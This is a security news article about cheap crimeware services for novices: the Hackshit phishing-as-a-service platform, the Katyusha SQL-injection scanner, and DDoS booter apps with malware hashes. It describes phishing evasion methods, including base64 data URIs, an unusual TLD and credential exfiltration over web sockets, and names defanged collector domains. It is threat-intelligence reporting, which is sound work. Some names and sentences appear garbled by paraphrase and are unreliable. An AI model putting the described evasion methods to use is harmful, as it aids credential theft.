In this article we will discuss Online Tools and Services for Wannabe Criminals: A Dangerous Trend.
Hackshit PhaaS platform for Online Tools and Services
Today it is quite easy to carry out any kind of attack without specific knowledge, for example phishing campaigns using tools like Hackshit.
Hackshit crimeware-as-a-service was discovered by experts from Netskope Threat Research Labs in July; It is a Phishing-as-a-Service (PhaaS) platform that offers a low-cost “automated solution for novice fraudsters”.
The platform allows would-be fraudsters to easily launch a phishing campaign. Hackshit attracts new subscribers by offering them free trial accounts to view a limited set of hacking tutorials and tricks to make easy money.
“Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform called Hackshit that logs the credentials of phishing victims. Phishing pages are wrapped with base64 encoding and served from secure (HTTPS) websites with the “.moe” top-level domain (TLD) to avoid traditional scanners. The “.moe” TLD is intended for the purpose of ‘Marketing the products or services considered.’ The victim’s credentials are sent to the Hackshit PhaaS platform via web sockets. ” says a blog post published by Netskope.
The PhaaS platform was discovered during research into CloudPhishing attack trends, Netskope experts observed a phishing site using a data URI scheme to serve base64 encoded content (data:text/html;base64) delivered from “https://a.safe. Baby.”
When visiting the link, the researchers were presented with a phishing login page for Google Docs, once victims provided their credentials, they were redirected to a second phishing page whose source uses a data URI scheme to serve base64 encoded content (data:text/html ;base64), also in in this case from https://a.safe.moe.
This second phishing page was designed to trick victims into providing their email account recovery details. Once the victim provides their details, they will be redirected to the original Google recovery page.
The experts decoded the two phishing pages and found that the credentials are sent to the attacker via a web socket at https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com .
“Access to logshit[.]com led us to the discovery of a PhaaS site called Hackshit, as shown in the image Further research concluded that the site serves as a PhaaS platform,” the blog post continues.
Hackshit is a PhaaS platform that offers various phishing services that fraudsters could use to customize their phishing campaign. Subscribers can easily create their own unique phishing pages for many popular services, including Yahoo, Facebook and Gmail.
The discovery of Hackshit revealed another interesting aspect of the platform; it also establishes a black market for buying and selling such services.
“A marketplace is a portal that offers services to be bought and sold to carry out phishing attacks,” explained Netskope researcher Ashwin Vamshi.
“The attacker then generates a phishing page from the page link/generator and logs into the victim’s email account, displays all contacts, and sends an email with the phishing link embedded.”
The marketplace allows a cybercriminal to purchase login accounts obtained through a phishing attack; allows payment with Perfect Money or Bitcoin.
Experts also noticed that the Hackshit website uses an SSL certificate issued by the open certificate authority Let’s Encrypt.
The operators behind Hackshit PhaaS offer several subscription levels from Starter to Master, ranging from $40 per week to $250 for 2 months.
Katyusha Scanner, the new SQLi Vulnerability Scanner
A few weeks ago, the experts at Recorded Future discovered a fully automated SQLi vulnerability scanner called Katyusha Scanner on a hacker forum. The tool was offered for sale for only 500 dollars, it allows mass scanning, easily managed from a smartphone via Telegram messenger.
Again, the tool has been designed so that anyone can use it, even without specific technical skills. It appeared in the hacker underground in early April, and according to researchers, it was developed from the open source penetration testing tool Arachni Scanner.
To use the tool, attackers just need to set up a standard web server with a version of the Arachni scanner that has been modified to allow control of the operation via a linked Telegram account.
The authors of the Katyusha Scanner seem to be very active; they have updated this tool seven times since it went online.
The Katyusha scanner was offered in Pro and Lite versions, which range between $250 and $500.
The Pro version uses known exploits to break into the system; once an SQL injection error is found, the tool notifies the attacker via a text message that includes the website name, Alexa rating, and number of available databases.
“On April 8, 2017, a Russian-speaking member of a top hacking forum introduced “Katyusha Scanner”, a powerful and fully automated SQLi vulnerability scanner that uses the features of Telegram messenger and Arachni Scanner, an open source penetration testing. tool,” according to a blog post published by RecorderFuture.
The released product, along with excellent support and frequent updates, immediately gained popularity and recognition from grateful clients for its intuitive and straightforward interface, as well as incredible performance.”
The seller is top Russian hackers, often Russian-speaking, who are known in the hacker underground for selling data stolen from e-commerce websites, the forum where the tool is commercialized.
The tool can be controlled via Telegram; allows operators to upload a list of target websites and launch a concurrent attack against them at the same time.
Attackers can control the attack using almost any mobile OS.
“Interestingly, the name Katyusha was not chosen by chance – it represents the iconic multiple rocket launcher, developed by the Soviet Union during World War II, known for causing panic in Nazi forces with its stealthy and devastating attacks. Similar to the highly lethal weapon created 70 years ago, the Katyusha Scanner allows criminals to launch large-scale penetration attacks against a large number of targeted websites with a few clicks using their smartphones,” the analysis continues.
The seller suggests starting with at least 500 landing pages; attackers can issue commands to scan them for known vulnerabilities. The Pro version also implements the ability to download all available exfiltrated data.
At the time of discovery, at least 12/15 users have already purchased this tool, giving positive feedback about its effectiveness.
The potential range of attacks this tool can support is alarming.
“When dozens buy it and launch attacks every day, the potential impact will be significant,” said Recorded Future’s advanced collection director Andrei Barysevich. “The range of attacks available to criminals is now completely unprecedented. And the convenience of this; someone who wants to engage in this type of activity doesn’t have to be a hacker, doesn’t have to know how certain tools work, or what exploit packages to use. The tool will do everything for them.”
Recorded Future reported the discovery to law enforcement.
Availability of DDoS tools online
We have shown that it is quite simple and cheap to pay for doing SQL Injection attacks or organizing phishing campaigns, what about DDoS attacks?
It is not a mystery, finding a booter and DDoS service online is quite easy, according to a study conducted by experts from Arbor’s ASERT Team in 2016, a daily DDoS booter attack costs $60 and can cause $720,000 in damage.
Sometimes bootloader or stressor services are marketed as would-be legitimate tools for security professionals who need to test their infrastructure’s resilience to cyberattacks or their ability to support high volumes of traffic.
Unfortunately, criminal organizations continue to abuse booters for illegal DDoS attacks, one of the most popular examples being the one used by LizardSquad hackers, LizardStresser.
Popular security expert Brian Krebs and a research team discovered that the Lizard Stresser DDoS tool relies on compromised home routers, which is very common for this kind of illegal service.
DDoS tools require no apparent skill to use, just by providing an IP address an attack can be launched. These tools are increasingly available on the Internet.
The internet is full of places where it is also possible to find software and platform specifically designed for DDoS attacks and the main problem is that generally many young people download and use these tools.
Many criminal organizations spread their vulnerable applications through increasingly blatant means on mainstream social media where most of the younger generations live.
Security experts from the cyber research division of Frontline Cyber Security Ltd recently discovered several DDoS tools while browsing the web and searching some popular social media sites.
Experts have discovered how easily DDoS tools are available to ordinary web users.
Distributed denial of service applications found by experts (Details removed from download links, please contact us if you are a researcher/analyst. ) are:
- LOIC RedCult Edition – RiskwareAgent – MD5 609db4b9154f9aee29a5ceb775bec655
- RedCult Dose – Loic.7 – MD5 6d0abacacd4393f9b3e30b2ed3be316e
- RC Door – Malware.SDi.5EDF – MD5 b1465ff2711b3cc9c4c8faf414354e7d
- exe – Win32.DarkKomet – MD5 606aeb40c65070d234e1617d1ab257ff
- ddos_android – Android.SpyAgent – MD5 c99ccf4d61cefa985d94009ad34f697f
Here is a picture of the Android app running, fill in a few fields and click submit.
The experts also obtained a list of targets on which the applications were released to attack, and also managed to collect screenshots of the tools used against government sites.
Below are some images of the app being used in what appears to be one of many anonymous operations as part of Operation #OpIsrael.
Experts have also collected information regarding the servers on which the tool was designed to attack, but now they cannot publish it.
The figure below shows a shared and distributed application
Regarding the DDoS tools mentioned above, the authorities have been notified and are helping to remove them.
The examples presented in this short article show that it is quite easy for an attacker to mount a cyber attack even without specific technical skills.
Hackshit’s analysis showed that crimeware-as-a-services poses a serious risk to businesses and end users, bringing would-be hackers into the cybercrime arena.
DDoS attacks, phishing campaigns and SQL Injection attacks are among the most popular threats to organizations and companies today.
The availability of any kind of hacking tools and services online makes it even easier for criminals to enter the cyber arena.